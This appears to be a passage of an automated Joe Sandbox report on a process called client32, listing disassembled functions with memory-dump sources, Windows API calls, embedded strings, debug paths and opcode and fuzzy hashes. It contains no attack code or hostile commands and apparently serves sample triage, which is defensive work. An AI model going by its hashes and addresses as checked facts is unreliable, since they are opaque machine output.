                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalMessagePostSectionThread$CurrentEnterEventLeaveObjectSingleWait
                                                                                                • String ID: Queue
                                                                                                • API String ID: 620033763-3191623783
                                                                                                • Opcode ID: c9bdb22b0c5437b0c602fadfafc90ea69592b09b854d51824fb9e337985eaf55
                                                                                                • Instruction ID: aa9ee7fa5209da3e0dd1839fe93b25f8ce66fe4d3b1f54b556150c9cec9c8d37
                                                                                                • Opcode Fuzzy Hash: c9bdb22b0c5437b0c602fadfafc90ea69592b09b854d51824fb9e337985eaf55
                                                                                                • Instruction Fuzzy Hash: C911AC75A41640ABEF21DF74D961B0A77A8AF4A794F00C036EA0597A80DB70EC11CBA5
                                                                                                Function 11093410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registrywindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                                • LoadIconA.USER32(1109350C,00002716), ref: 11093456
                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 11093465
                                                                                                • RegisterClassA.USER32(?), ref: 11093483
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClassLoad$CursorIconInfoRegister
                                                                                                • String ID: NSMClassList
                                                                                                • API String ID: 2883182437-2474587545
                                                                                                • Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                                • Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
                                                                                                • Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                                • Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5
                                                                                                Function 69CFDBD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                • wsprintfA.USER32 ref: 69CFDC04
                                                                                                • _memset.LIBCMT ref: 69CFDC27
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_malloc_memsetwsprintf
                                                                                                • String ID: Can't alloc %u bytes$Refcount.cpp
                                                                                                • API String ID: 2405090531-3988092936
                                                                                                • Opcode ID: 7aee5c1d1114a1df1cb1a86670246867f3fbe7ae79bbf102fe7657a5f2a46ffa
                                                                                                • Instruction ID: dec2e19c354cc3e506af3b1b259caafcaa0acc61d8c5ca3b8db2c0f5cd3ff07d
                                                                                                • Opcode Fuzzy Hash: 7aee5c1d1114a1df1cb1a86670246867f3fbe7ae79bbf102fe7657a5f2a46ffa
                                                                                                • Instruction Fuzzy Hash: 90F0F6B690011867C710EB64AD05F9FB77C9F86B18F4040B9FF09A7141E734AA0686E5
                                                                                                Function 69CE9160 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetVersionExA.KERNEL32(?,?), ref: 69CE9188
                                                                                                • GetUserNameA.ADVAPI32(69CF6AD7,?), ref: 69CE91CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: NameUserVersion
                                                                                                • String ID: *CurrentUserName$@$client
                                                                                                • API String ID: 427591506-3887416126
                                                                                                • Opcode ID: 8b98b8e3083ef819af30078adb8cb77cf4ce3ff1ed044e057610671372e20820
                                                                                                • Instruction ID: 1ded5f8531b8b2e30c4630f1164c75a83eee0cdbf340ae824160c540540f6f17
                                                                                                • Opcode Fuzzy Hash: 8b98b8e3083ef819af30078adb8cb77cf4ce3ff1ed044e057610671372e20820
                                                                                                • Instruction Fuzzy Hash: 6401A274D00118DBEB10EF64D91AFADB3B8EB05318F4080E9EA0E62141DA311E488BA4
                                                                                                Function 69CFABC0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 69CFABDA
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_malloc
                                                                                                • String ID: IsA()$IsEmpty()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                • API String ID: 501242067-2615622132
                                                                                                • Opcode ID: 497d46d29cfd4d802aca4b1825aee29e93bf021378c96617572d71085c5e42db
                                                                                                • Instruction ID: 4aca94c97bdef78dbaf4c7b93d7aa6d9c6ea8fcdc4a819bb7a71cb3bf9b8bcff
                                                                                                • Opcode Fuzzy Hash: 497d46d29cfd4d802aca4b1825aee29e93bf021378c96617572d71085c5e42db
                                                                                                • Instruction Fuzzy Hash: DBF09AF16106009FD324DF48EC01B0AB7D89F5971CF40C479FB599BA81E372AC4A97A2
                                                                                                Function 11145450 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11145463
                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage,?,11037F05), ref: 11145475
                                                                                                • FreeLibrary.KERNEL32(00000000,?,11037F05), ref: 11145485
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                • API String ID: 145871493-545709139
                                                                                                • Opcode ID: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                                • Instruction ID: e6235b5ae6f1dfca5c3043155b5dfa22c054f7606e96d7ad1ec578fde494cc77
                                                                                                • Opcode Fuzzy Hash: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                                • Instruction Fuzzy Hash: A1F0A7317021744FE3568AB69F84AAEFAD5EB81B7AB190135E430CAA98E73488408765
                                                                                                Function 110ED0D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsWindow.USER32(00000000), ref: 110ED0D9
                                                                                                • SendMessageA.USER32(00000000,0000045B,11020C43,00000000,?,11020C43,00000000,00000001), ref: 110ED10D
                                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04000000,?,11020C43,00000000,00000001), ref: 110ED11C
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
                                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                                                • API String ID: 2446111109-1196874063
                                                                                                • Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                                • Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
                                                                                                • Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                                • Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED
                                                                                                Function 1115F1F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
                                                                                                • GlobalDeleteAtom.KERNEL32 ref: 1115F212
                                                                                                • GlobalDeleteAtom.KERNEL32 ref: 1115F21C
                                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AtomDeleteGlobal$LongWindow
                                                                                                • String ID: qu
                                                                                                • API String ID: 964255742-2766958120
                                                                                                • Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                                • Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
                                                                                                • Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                                • Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
                                                                                                Function 11017420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindWindowA.USER32 ref: 11017428
                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 11017437
                                                                                                • PostMessageA.USER32 ref: 11017458
                                                                                                • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessageWindow$FindLongPostSend
                                                                                                • String ID: IPTip_Main_Window
                                                                                                • API String ID: 3445528842-293399287
                                                                                                • Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                                • Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
                                                                                                • Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                                • Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698
                                                                                                Function 69D04F31 Relevance: 7.7, APIs: 5, Instructions: 160COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                                • String ID:
                                                                                                • API String ID: 4048096073-0
                                                                                                • Opcode ID: baa3d1309f35f1cf240b172b7daea1819837b361dbb2c345d08023d0c973fbbc
                                                                                                • Instruction ID: 904dacae52740412e51e84f1f1c780ec9544c24c74b26df15612c618d74cb4f3
                                                                                                • Opcode Fuzzy Hash: baa3d1309f35f1cf240b172b7daea1819837b361dbb2c345d08023d0c973fbbc
                                                                                                • Instruction Fuzzy Hash: 4C51D670A00305DBCB10CFAACA60A9EBB71BF51364F108239EC74D7994E771DA61CB91
                                                                                                Function 69CFAC30 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __strdup.LIBCMT ref: 69CFAC64
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 69CFACA1
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 69CFACB7
                                                                                                • _malloc.LIBCMT ref: 69CFACC6
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 69CFACE0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$__strdup_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 2291067320-0
                                                                                                • Opcode ID: 1d26e74370261f319d98c9b83190a2371fca1f8d81201b7fedbc611da68c9142
                                                                                                • Instruction ID: 3df07b6a67e533ed8639357dc3acbb40865553732efb93fa1a841068ae789a3b
                                                                                                • Opcode Fuzzy Hash: 1d26e74370261f319d98c9b83190a2371fca1f8d81201b7fedbc611da68c9142
                                                                                                • Instruction Fuzzy Hash: 1731C071A04209AFE710CF25CC59FABBBB8EF46764F14C165ED45AB280E671A905CB90
                                                                                                Function 11081590 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                • %02x, xrefs: 11081610
                                                                                                • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647
                                                                                                • ..\CTL32\DataStream.cpp, xrefs: 1108165E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf
                                                                                                • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                                • API String ID: 2111968516-476189988
                                                                                                • Opcode ID: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                                • Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
                                                                                                • Opcode Fuzzy Hash: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                                • Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60
